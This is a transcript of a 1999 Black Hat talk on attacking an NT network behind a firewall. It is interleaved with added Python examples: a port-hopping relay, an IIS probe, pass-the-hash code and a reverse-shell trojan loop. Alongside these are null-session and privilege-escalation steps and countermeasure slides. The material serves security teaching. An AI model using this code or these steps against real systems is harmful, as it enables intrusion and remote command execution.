Presentation on theme: "eXtreme Hacking, Black Hat 1999: Over the Router, Through the Firewall, to Grandma's House We Go" (George Kurtz & Eric Schultze, Ernst & Young LLP). Presentation transcript:

Slide 1: © 1999 Ernst & Young LLP. eXtreme Hacking, Black Hat 1999. Over the Router, Through the Firewall, to Grandma's House We Go. George Kurtz & Eric Schultze, Ernst & Young LLP

Slide 2: Session Objective
- Discuss common DMZ and host configuration weaknesses
- Demonstrate what may happen if a hacker were to exploit these weaknesses
- Present countermeasures to help secure the network and related hosts

Slide 3: Network Diagram (figure; hosts labelled 10.1.1.20, 10.1.1.10, 172.16.1.200, 172.16.1.50 and 192.168.1.20)

Slide 4: Network Design
- Internet router is blocking TCP/UDP ports 135-139
- NT Web Server (SP3) is dual-homed
- Firewall allows only outbound HTTP (80) and SMTP (25) traffic

Slide 5: Hacker's Objective: gain control over the internal NT server from the Internet

Slide 6: SysAdmin's Objective: identify holes in the environment and close them

Slide 7: Target Selection
- Ping sweep: gping, fping
- Port scan: nmap, NetscanTools Pro 2000
- OS identification: nmap -O, queso
- Banner grabbing: VisualRoute, Netcat

Slide 8: ttdb
- Buffer overflow in rpc.ttdbserver
- Allows a user to execute arbitrary code
- The arbitrary code can shell back an xterm as root

Slide 9: Netcat Redirection (figure; hosts labelled 10.1.1.20, 172.16.1.50 and 172.16.1.200)

Slide 10: Netcat Redirection
- Attack Linux listens on 139 and redirects to 1139 on Sparc
- Sparc listens on 1139 and redirects to 139 on NT Web Server
- Attack NT issues its NetBIOS request to Attack Linux
- The NetBIOS request is forwarded over the router to the NT Web Server (it crosses the router on port 1139, which lies outside the blocked 135-139 range)
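The two-hop relay on this slide, written out as an added example (not code from the talk, and not netcat or rinetd itself). Each hop is a small TCP forwarder of the kind rinetd provides: it accepts a connection on one port and copies bytes both ways to the next hop. The hosts are stand-ins: everything binds to 127.0.0.1 on OS-chosen ports, and the "NT Web Server" at the end of the chain is a constructed echo service that tags whatever reaches it, so the test can confirm the request travelled Attack NT -> Attack Linux "139" -> Sparc "1139" -> NT "139".

```python
"""Two-hop TCP relay, the pattern the slide builds with netcat/rinetd.

Added example, not code from the original talk. Hosts and ports are
stand-ins: everything runs on 127.0.0.1 with OS-assigned ports, and the
"NT Web Server" is a constructed echo service that tags what it receives.
"""
import socket
import socketserver
import threading


def _pump(src, dst):
    """Copy bytes from src to dst until EOF, then half-close dst."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class _RelayHandler(socketserver.BaseRequestHandler):
    """Open the next hop and shuttle bytes in both directions."""

    def handle(self):
        with socket.create_connection(self.server.next_hop, timeout=5) as upstream:
            back = threading.Thread(target=_pump, args=(upstream, self.request), daemon=True)
            back.start()                  # next hop -> client
            _pump(self.request, upstream)  # client -> next hop
            back.join()


class Relay(socketserver.ThreadingTCPServer):
    """Listen on one port and forward every connection to next_hop (what rinetd does)."""
    daemon_threads = True

    def __init__(self, listen, next_hop):
        super().__init__(listen, _RelayHandler)
        self.next_hop = next_hop


class _EchoHandler(socketserver.BaseRequestHandler):
    """Constructed stand-in for the final target: read to EOF, answer with a tag."""

    def handle(self):
        data = b""
        while True:
            chunk = self.request.recv(4096)
            if not chunk:
                break
            data += chunk
        self.request.sendall(b"NT got: " + data)


def serve(server):
    """Run a socketserver in the background and return the port it was given."""
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server.server_address[1]


def send_through(port, payload):
    """Connect to port, send payload, half-close, return whatever comes back."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        out = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                return out
            out += chunk


def demo(payload=b"NetBIOS session request"):
    """Build NT <- Sparc relay <- Linux relay and push one request along the chain."""
    nt = socketserver.ThreadingTCPServer(("127.0.0.1", 0), _EchoHandler)
    nt.daemon_threads = True
    nt_port = serve(nt)
    sparc = Relay(("127.0.0.1", 0), ("127.0.0.1", nt_port))      # "1139 -> NT:139"
    sparc_port = serve(sparc)
    linux = Relay(("127.0.0.1", 0), ("127.0.0.1", sparc_port))   # "139 -> Sparc:1139"
    linux_port = serve(linux)
    try:
        return send_through(linux_port, payload)   # Attack NT's request enters here
    finally:
        for srv in (linux, sparc, nt):
            srv.shutdown()
            srv.server_close()


if __name__ == "__main__":
    print(demo())
```

The relay only knows a listen port and a next hop, which is exactly why the router filter on 135-139 does not help: the packet crossing it carries port 1139. A defender reading this should note that the countermeasure on slide 20 (deny by default, open only policy ports) is what breaks the chain, not a longer block list.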

Slide 11: Enumerate NT Information
- Null session: net use \\172.16.1.50\ipc$ "" /user:""
- NetUserEnum (local, global, DumpACL)
- NetWkstaTransportEnum (Getmac)
- RpcMgmt Query (EPDump)

Slide 12: Privilege Escalation
- Plant sechole on the NT Server
- Execute sechole via HTTP
- The IUSR account becomes admin
- Add a new user account (via HTTP)
- Add the new user account to the Administrators group (via HTTP)

Slide 13: IIS Buffer Overflow
- Determine if the server is vulnerable:
  nc 172.16.1.200 80
  GET /.htr HTTP/1.0
  Evaluate the response
- Crash IIS and send the payload
- The target server contacts our web server and downloads the payload
- The payload executes on the server and contacts our attack host
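The probe on this slide and the banner grabbing on slide 7 are the same netcat move: open the port, send a raw request, read what comes back. As an added example (not code from the talk), here is that probe with a parser for the status line and headers, plus a constructed local server standing in for the target so it runs offline. The slide does not state what response marks the server as vulnerable, so the code extracts the status and Server banner for the operator to evaluate rather than inventing a verdict; the "Microsoft-IIS/4.0" banner the fake returns is constructed for the test.

```python
"""Raw HTTP probe (GET /.htr HTTP/1.0) with a constructed local target.

Added example, not the talk's own code. The fake server's banner is made up
for the demo; the parser only reports what the real target would say.
"""
import socket
import socketserver
import threading


def parse_response(raw):
    """Return (status_code, headers) from a raw HTTP response, or None if it is not HTTP."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ", 2)
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return int(parts[1]), headers


def probe(host, port, path=b"/.htr", timeout=5):
    """Send the slide's request verbatim (HTTP/1.0, no Host header) and parse the reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"GET " + path + b" HTTP/1.0\r\n\r\n")
        raw = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            raw += chunk
    return parse_response(raw)


class _FakeIIS(socketserver.BaseRequestHandler):
    """Constructed stand-in for the target: answers any request with a fixed banner."""

    def handle(self):
        self.request.recv(4096)
        body = b"<html>constructed</html>"
        self.request.sendall(
            b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/4.0\r\n"
            b"Content-Length: %d\r\n\r\n" % len(body) + body
        )


def demo():
    """Run the probe against the fake target and return (status, server banner)."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), _FakeIIS)
    port = srv.server_address[1]
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        status, headers = probe("127.0.0.1", port)
    finally:
        srv.shutdown()
        srv.server_close()
    return status, headers.get("server")


if __name__ == "__main__":
    print(demo())
```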

Slide 14: VNC

Slide 15: Pass The Hash
- A modified SMB client can mount shares (C$, etc.) on a remote NT host using only the username and the password hash
- No need to "decrypt" the password hash
- Concept first presented by Paul Ashton in an NTBugtraq post

Slide 16: Pass The Hash v.2
- Create an admin account on our own NT host with the same name as the admin account for which we have hash values
- Upload the hash values into memory on our own NT host
- Perform pass-through authentication to the target host
- No need to "decrypt" the password
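Slides 15 and 16 both rest on one fact: the NT hash is MD4 over the UTF-16LE password, and the challenge-response the server checks is computed from that hash, so whoever holds the hash (from pwdump, as the tool list later notes) never needs the password. The added example below (not code from the talk or from the modified SMB client it cites) makes that concrete. MD4 is implemented inline because hashlib may not ship it. The response shown is NTLMv2 as specified in MS-NLMP; the 1999 demo ran against NT4's LM/NTLM(v1), whose DES-based response differs in detail but has the same property. The user name, domain, server challenge and client blob are constructed for the demo, and the blob is an opaque byte string here, not a real NTLMv2 blob layout.

```python
"""Why pass-the-hash works: the NT hash, not the password, is the key.

Added example, not code from the talk. MD4 is implemented here because
hashlib may not provide it; the challenge-response is NTLMv2 per MS-NLMP.
User, domain, challenge and blob are constructed values for the demo.
"""
import hashlib
import hmac
import struct

_M = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; Windows's NT hash is MD4 over the UTF-16LE password."""
    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & _M

    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (G, 0x5A827999, (3, 5, 9, 13), [i // 4 + 4 * (i % 4) for i in range(16)]),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for fn, const, shifts, order in rounds:
            for i in range(16):
                j = (-i) % 4  # update a, d, c, b, a, d, ... in turn
                v[j] = rotl((v[j] + fn(v[(j + 1) % 4], v[(j + 2) % 4], v[(j + 3) % 4])
                             + X[order[i]] + const) & _M, shifts[i % 4])
        state = [(s + w) & _M for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: what the SAM stores and what pwdump extracts."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(nthash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain)); needs only the hash."""
    return hmac.new(nthash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_response(nthash, user, domain, server_challenge, blob):
    """Client side: NtProofStr || blob, derived from the hash alone."""
    proof = hmac.new(ntowf_v2(nthash, user, domain), server_challenge + blob, hashlib.md5).digest()
    return proof + blob


def server_verify(stored_nthash, user, domain, server_challenge, response):
    """Server side (or the DC on pass-through auth): it too holds only the hash."""
    proof, blob = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(stored_nthash, user, domain), server_challenge + blob,
                        hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


def demo(attacker_hash=None):
    """Authenticate as Administrator holding nothing but the NT hash."""
    # The target's stored hash is seeded from a constructed password only so the
    # demo is self-contained; the attacker path below never sees that password.
    target_store = nt_hash("password")
    if attacker_hash is None:
        attacker_hash = target_store            # "stolen" copy, e.g. via pwdump
    challenge = bytes.fromhex("0123456789abcdef")  # constructed 8-byte server challenge
    blob = bytes.fromhex("0101000000000000c0ffee00c0ffee0000000000")  # constructed opaque blob
    response = ntlmv2_response(attacker_hash, "Administrator", "EYDEMO", challenge, blob)
    return server_verify(target_store, "Administrator", "EYDEMO", challenge, response)


if __name__ == "__main__":
    print(nt_hash("password").hex(), demo())
```

The verify step is the point of slide 16: the target (or the domain controller it passes the request through to) compares against its own stored hash, so a host that has the same hash loaded for the same account name produces an answer it accepts. Nothing in the exchange requires inverting MD4, which is why the countermeasures on slides 22 and 23 concentrate on not leaking the hashes in the first place.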

Slide 17: Network Diagram (figure; hosts labelled 10.1.1.20, 172.16.1.200, 172.16.1.50 and 192.168.1.20)

Slide 18: Shovel The Shell (figure; hosts labelled 10.1.1.20 and 192.168.1.20)

Slide 19: Shovel The Shell
- Launch two Netcat listeners on AttackLinux (ports 80 and 25, the only outbound ports the firewall allows)
- Execute the trojan on the NT Server: it Netcats TO port 80 on AttackLinux
- Commands typed on AttackLinux (port 80) are piped to CMD.exe on the NT Server
- CMD.exe output is Netcatted TO port 25 on AttackLinux
- Type commands in the port 80 window, view output in the port 25 window
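The plumbing on this slide, modelled locally as an added example (not the talk's trojan). Two listeners stand in for the netcat windows on AttackLinux: the command channel ("80") and the output channel ("25"). The "NT Server" side dials out to both, runs each line it receives and writes the result to the second channel. Everything runs on 127.0.0.1 with OS-chosen ports, the command is a constructed `echo`, and the interpreter is the local shell rather than CMD.exe, so the `runner` callable is the only part that would differ on the real target.

```python
"""Shovel-the-shell plumbing: command channel in, output channel out.

Added example, not the talk's trojan. Listens on 127.0.0.1 with OS-chosen
ports; the command interpreter is the local shell, not CMD.exe.
"""
import socket
import subprocess
import threading


def _listener():
    """One netcat-style listener (what `nc -l -p 80` / `-p 25` did on AttackLinux)."""
    s = socket.socket()
    s.bind(("127.0.0.1", 0))
    s.listen(1)
    return s


def run_command(line: str) -> bytes:
    """Execute one command line through the local shell (CMD.exe in the talk)."""
    done = subprocess.run(line, shell=True, capture_output=True)
    return done.stdout + done.stderr


def victim(cmd_addr, out_addr, runner=run_command):
    """The trojan's loop: dial out on both ports, run each line, ship the output back."""
    with socket.create_connection(cmd_addr) as cmd, socket.create_connection(out_addr) as out:
        buf = b""
        while True:
            chunk = cmd.recv(4096)
            if not chunk:             # attacker closed the command window
                return
            buf += chunk
            while b"\n" in buf:
                line, buf = buf.split(b"\n", 1)
                out.sendall(runner(line.decode()))


def demo(command="echo shoveled"):
    """Attacker side: open both listeners, accept the callbacks, send one command."""
    cmd_l, out_l = _listener(), _listener()
    t = threading.Thread(target=victim, args=(cmd_l.getsockname(), out_l.getsockname()),
                         daemon=True)
    t.start()                          # stands in for "execute trojan on NT Server"
    cmd_conn, _ = cmd_l.accept()       # the port 80 window: type commands here
    out_conn, _ = out_l.accept()       # the port 25 window: read output here
    with cmd_conn, out_conn:
        cmd_conn.sendall(command.encode() + b"\n")
        cmd_conn.shutdown(socket.SHUT_WR)
        result = b""
        while True:
            chunk = out_conn.recv(4096)
            if not chunk:
                break
            result += chunk
    t.join(5)
    cmd_l.close()
    out_l.close()
    return result


if __name__ == "__main__":
    print(demo())
```

Both connections are initiated by the inside host toward ports the firewall treats as ordinary web and mail egress, which is why the countermeasures on slide 20 include log review and intrusion detection rather than relying on the filter alone.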

Slide 20: Network Countermeasures
- Block ALL ports at the border routers
- Open only those ports that support your security policy
- Review logs
- Implement network and host intrusion detection

Slide 21: Unix Countermeasures
- TTDB
  - Kill the "rpc.ttdbserverd" process
  - Apply vendor-specific patches
  - Block low- and high-numbered RPC locator services at the border router
- Xterm
  - Remove trusted relationships with xhost -
  - If sending sessions to another terminal, restrict to a specific terminal
  - Block ports 6000-6063 if necessary

Slide 22: NT Countermeasures
- Block TCP and UDP ports 135, 137, 138 and 139 at the router
- Prevent information leakage:
  - Use the RestrictAnonymous registry value: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa, RestrictAnonymous, DWORD = 1
  - Unbind "WINS Client (TCP/IP)" from the Internet-connected NIC

Slide 23: NT Countermeasures
- Password composition
  - 7 characters is the strongest humanly usable length, 14 is the strongest (the LM hash is computed over two independent 7-character halves, so a password that does not fill a half adds nothing)
  - Use meta-characters within the first 7 characters of your password
- Utilize account lockout
- Utilize passfilt.dll to require stronger passwords
- Utilize the Passprop.exe admin lockout feature

Slide 24: NT Countermeasures
- Apply current service packs and security-related hotfixes
- Review the IIS security checklist: www.microsoft.com/security/products/iis/CheckList.asp

Slide 25: Countermeasures Disclaimer: test all changes on a non-production host before implementing them on production servers

Slide 26: Tools and Concepts
- Visual Route: www.visualroute.com
- NetScanTools Pro: www.nwpsw.com
- gping, fping: www.securityfocus.com
- nmap: www.insecure.org/nmap/
- queso: www.apostols.org/projectz/
- ttdb exploit: www.securityfocus.com
- netcat: www.l0pht.com
- rinetd: www.boutell.com

Slide 27: Tools and Concepts
- VMWare: www.vmware.com
- NT Resource Kit: www.microsoft.com
- DumpACL: www.somarsoft.com
- sechole: www.cybermedia.co.in
- pwdump: www.rootshell.com
- L0phtCrack: www.l0pht.com
- VNC: www.uk.research.att.com
- modified SMB client: www.ntbugtraq.com

Slide 28: Security Resources
- www.microsoft.com/security: advisories, patches, IIS Security Checklist
- www.securityfocus.com: Bugtraq mailing list; tools, books, links; vulnerabilities and fixes

Slide 29: Hacking Exposed: Network Security Secrets and Solutions. George Kurtz, Stuart McClure, Joel Scambray. Osborne/McGraw-Hill, due out September 1999

Slide 30: Contact Information
- George Kurtz: george.kurtz@ey.com, (201) 836-5280
- Eric Schultze: eric.schultze@ey.com, (425) 990-6916
- Web site: www.ey.com/security
